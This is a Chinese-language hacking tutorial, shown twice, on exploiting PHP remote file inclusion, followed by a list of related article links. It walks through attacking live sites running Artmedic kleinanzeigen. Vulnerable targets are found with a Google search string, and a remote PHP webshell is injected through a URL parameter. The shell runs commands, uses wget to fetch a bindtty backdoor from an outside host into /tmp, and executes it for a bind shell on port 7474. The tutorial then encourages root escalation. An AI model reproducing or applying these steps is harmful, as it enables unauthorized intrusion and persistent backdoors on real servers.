远程文件包含漏洞的利用
来源:互联网 发布:周灏 数据图网易新闻 编辑:程序博客网 时间:2024/04/29 10:00
论坛登陆名: CrAcKlOVe
提交者邮件地址: CrAcKlOVe@Zj.com
提交者QQ号码:
版权:文章属中华安全网http://www.safechina.net和作者共同所有,转载请注明出处!!
标题: 远程文件包含漏洞的利用
内容:
▲远程文件包含漏洞的利用
****************************
*AuThor:CrAcKlOvE *
*emA!l:CrAcKlOvE#zJ.cOM *
*HoMePaGe:N/a,mAyBe DoWn *
****************************
1)什么是远程文件包含漏洞?
让我们先看看以下代码,
<?
<!--- cOdz --->
include($page);
<!--- cOdz --->
?>
由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,
以web权限执行远程文件.
2)漏洞的初步应用
假设某一站点的index.php代码如下
<?
<!--- cOdz --->
include($page);
<!--- cOdz --->
?>
我们就可以提交:
http://siteurl.tld/index.php?page=http://远程服务器/文件名称
假设远程服务器warez.php,内容为
<?
<!--- cOdz --->
system("ls /tmp/");
<!--- cOdz --->
?>
这样就能把warez.php下载到本地,并且执行! 说白了,就是把tmp下的文件显示出来.
3)实战演练
说了一大堆,现在开始锻炼实践能力了,嘿嘿.
⑴准备工作:
①存在远程文件包含漏洞的站点
②phpshell
③Backdoor
对于①,大家可以到www.cnns.net或者www.securiteam.com关注近期的漏洞,一定会有的,我们拿最近的Artmedic kleinanzeigen漏洞练手.
Artmedic kleinanzeigen由于index.php的$site变量缺少过滤,导致了远程文件包含漏洞.所以我们可以提交以下url
http://Artmedic kleinanzeigen url/path/index.php?site=http://phpshellurl
那如何找到使用Artmedic kleinanzeigen的站点呢?这里有个小技巧,我顺便说一下.
我先去Artmedic kleinanzeigen的官方站找到Artmedic kleinanzeigen程序的演示,随便点了个连接,
连接为 http://siteurl.com/index.php?site=anzeigenmaerktestart,于是
在www.google.com,搜索index.php?site=anzeigenmaerktestart,
那些!
使用Artm
edic kleinanzeigen的站就差不多出来了,我们可以一一去尝试!
对于②,我推荐Data Cha0s PHP Command/Safemode Exploit 4.1,或者angel的saphpshell,phpspy,功能都不错.
对于③,你可以使用绑定端口的程序bind,然后根据程序绑定的端口telnet.你可以使用san以前用过的Digit-Labs Connect-Back Backdoor,
不过我经常使用bindtty,bindtty绑定7474端口.
⑵开始利用
①提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id
说明一下,cse.gif是上文所说的Data Cha0s PHP Command/Safemode Exploit 4.1,cmd=id是查询当前用户的权限.
一般所都是uid=99(nobody) gid=99(nobody) groups=99(nobody),uid不是0,所以他不是root级别的帐户.
竟然可以执行,那么说明system函数没有被禁止,那我们就可以大胆的执行命令了!
②提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty
这样就把bindtty下载到tmp目录下.可能你会为,为什么要下到tmp目录下呢?因为tmp目录一般都可写.
③文件已经下载了,我们必须设置属性,不然运行不了,会提示没有权限.
http:!
//xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=chmod 775 /tmp/bindtty
这样我们就有权限执行bindtty文件了!
④执行bindtty
http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=/tmp/bindtty
成功的话,它会显示Daemon is starting...OK, pid = xxxx.
因为上文已经说bindtty绑定的是7474端口,现在我们可以telnet host 7474.
ps:不推荐使用windows命令提示符进行telnet,会出现字符混乱的现象,推荐使用putty.
⑤提升到root,这就是你的工作了.你可以根据cse.gif所显示的一些信息寻找对应的exploit进行提升权限.
这样就差不多结束了,有问题的话欢迎提出.
提交者邮件地址: CrAcKlOVe@Zj.com
提交者QQ号码:
版权:文章属中华安全网http://www.safechina.net和作者共同所有,转载请注明出处!!
标题: 远程文件包含漏洞的利用
内容:
▲远程文件包含漏洞的利用
****************************
*AuThor:CrAcKlOvE *
*emA!l:CrAcKlOvE#zJ.cOM *
*HoMePaGe:N/a,mAyBe DoWn *
****************************
1)什么是远程文件包含漏洞?
让我们先看看以下代码,
<?
<!--- cOdz --->
include($page);
<!--- cOdz --->
?>
由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,
以web权限执行远程文件.
2)漏洞的初步应用
假设某一站点的index.php代码如下
<?
<!--- cOdz --->
include($page);
<!--- cOdz --->
?>
我们就可以提交:
http://siteurl.tld/index.php?page=http://远程服务器/文件名称
假设远程服务器warez.php,内容为
<?
<!--- cOdz --->
system("ls /tmp/");
<!--- cOdz --->
?>
这样就能把warez.php下载到本地,并且执行! 说白了,就是把tmp下的文件显示出来.
3)实战演练
说了一大堆,现在开始锻炼实践能力了,嘿嘿.
⑴准备工作:
①存在远程文件包含漏洞的站点
②phpshell
③Backdoor
对于①,大家可以到www.cnns.net或者www.securiteam.com关注近期的漏洞,一定会有的,我们拿最近的Artmedic kleinanzeigen漏洞练手.
Artmedic kleinanzeigen由于index.php的$site变量缺少过滤,导致了远程文件包含漏洞.所以我们可以提交以下url
http://Artmedic kleinanzeigen url/path/index.php?site=http://phpshellurl
那如何找到使用Artmedic kleinanzeigen的站点呢?这里有个小技巧,我顺便说一下.
我先去Artmedic kleinanzeigen的官方站找到Artmedic kleinanzeigen程序的演示,随便点了个连接,
连接为 http://siteurl.com/index.php?site=anzeigenmaerktestart,于是
在www.google.com,搜索index.php?site=anzeigenmaerktestart,
那些!
使用Artm
edic kleinanzeigen的站就差不多出来了,我们可以一一去尝试!
对于②,我推荐Data Cha0s PHP Command/Safemode Exploit 4.1,或者angel的saphpshell,phpspy,功能都不错.
对于③,你可以使用绑定端口的程序bind,然后根据程序绑定的端口telnet.你可以使用san以前用过的Digit-Labs Connect-Back Backdoor,
不过我经常使用bindtty,bindtty绑定7474端口.
⑵开始利用
①提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id
说明一下,cse.gif是上文所说的Data Cha0s PHP Command/Safemode Exploit 4.1,cmd=id是查询当前用户的权限.
一般所都是uid=99(nobody) gid=99(nobody) groups=99(nobody),uid不是0,所以他不是root级别的帐户.
竟然可以执行,那么说明system函数没有被禁止,那我们就可以大胆的执行命令了!
②提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty
这样就把bindtty下载到tmp目录下.可能你会为,为什么要下到tmp目录下呢?因为tmp目录一般都可写.
③文件已经下载了,我们必须设置属性,不然运行不了,会提示没有权限.
http:!
//xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=chmod 775 /tmp/bindtty
这样我们就有权限执行bindtty文件了!
④执行bindtty
http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=/tmp/bindtty
成功的话,它会显示Daemon is starting...OK, pid = xxxx.
因为上文已经说bindtty绑定的是7474端口,现在我们可以telnet host 7474.
ps:不推荐使用windows命令提示符进行telnet,会出现字符混乱的现象,推荐使用putty.
⑤提升到root,这就是你的工作了.你可以根据cse.gif所显示的一些信息寻找对应的exploit进行提升权限.
这样就差不多结束了,有问题的话欢迎提出.
- 远程文件包含漏洞的利用
- 远程文件包含漏洞的利用
- dvwa文件包含漏洞和远程文件利用漏洞
- 文件包含漏洞的利用
- 文件包含漏洞利用
- php远程文件包含漏洞
- 远程文件包含漏洞测试
- PHP文件包含漏洞利用
- php文件包含漏洞利用
- 远程包含漏洞和本地包含漏洞
- 远程包含和本地包含漏洞的原理
- 远程包含和本地包含漏洞的原理
- php文件包含+伪协议+文件上传漏洞利用实例
- 黑客如何利用文件包含漏洞进行网站入侵
- PHP文件包含漏洞原理分析和利用方法
- PHP文件包含漏洞原理分析和利用方法
- PHP文件包含漏洞原理分析和利用方法
- PHP文件包含漏洞原理分析和利用方法
- 关于此Blog的说明
- 抚今追昔“七小福”——来自sohu社区
- 数据挖掘与统计工作
- GDB使用指南
- 温伯格:给科学家的四条黄金忠告
- 远程文件包含漏洞的利用
- ASP中得到用户的真实IP地址
- 今天运动会,累,但是很开心~~
- WCET(Worst Case Execution Time)及有关分析方法
- Internet 怎么了?
- 数据库设计和ER模型
- JAVA开发环境配置说明书
- 午夜。。。。牛奶
- IISManager V1.1 是一个在线管理IIS,维护站点组件,安全稳定,最重要的是完全免费。
